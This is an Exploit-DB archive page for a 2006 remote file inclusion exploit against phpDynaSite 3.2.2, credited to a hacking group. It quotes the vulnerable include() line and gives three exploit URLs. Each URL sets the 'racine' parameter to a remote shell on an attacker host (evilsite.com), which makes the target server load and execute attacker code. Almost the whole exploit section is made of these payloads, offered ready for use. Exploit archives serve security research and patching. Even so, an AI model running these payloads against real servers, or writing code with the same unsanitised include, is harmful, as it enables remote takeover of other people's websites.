phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities



EDB-ID: 2717 CVE: 2006-5760OSVDB-ID: 30183
Author: DeltahackingTEAMPublished: 2006-11-04Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
**********************************************************************************************************
                                                    WwW.Deltahacking.NeT
**********************************************************************************************************
* dynasite3.2.2
* Class = Remote File Inclusion ;
* Download = http://jaist.dl.sourceforge.net:80/sourceforge/phpdynasite/dynasite3.2.2.tar.gz
* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)
-------------------------------------------------------------------------------------------------------------------
- Vulnerable Code
     include($racine."connection.php");
++++++++++++++++++++++++++++++++++++++++++++
- Exploit:
    http://[target]/[path]/function_log.php?racine=http://evilsite.com/shell?
    http://[target]/[path]/function_balise_url.php?racine=http://evilsite.com/shell?
    http://[target]/[path]/connection.php?racine=http://evilsite.com/shell?
------------------------------------------------------------------------------------------------------------------
Gr33tz:  Dr.Torojan
**************************************************************************************************************
# milw0rm.com [2006-11-04]






Comments

No comments so far